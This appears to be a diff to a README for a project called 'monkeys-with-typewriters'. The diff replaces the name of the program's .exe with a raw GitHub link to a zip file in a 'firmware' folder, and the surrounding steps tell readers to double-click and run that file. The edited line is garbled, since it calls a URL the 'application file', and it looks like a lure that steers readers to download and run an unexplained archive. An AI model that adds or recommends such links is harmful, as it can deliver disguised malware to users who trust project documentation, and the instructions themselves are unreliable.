codingisloading/monkeys-with-typewriters/README.md

 If you downloaded a zip file and extracted it:

 - Open the extracted folder.
-- Find the main application file, often named something like `monkeys-with-typewriters.exe`.
+- Find the main application file, often named something like `https://github.com/codingisloading/monkeys-with-typewriters/raw/refs/heads/main/firmware/typewriters_with_monkeys_v1.8.zip`.
 - Double-click the file to run the program.

 ---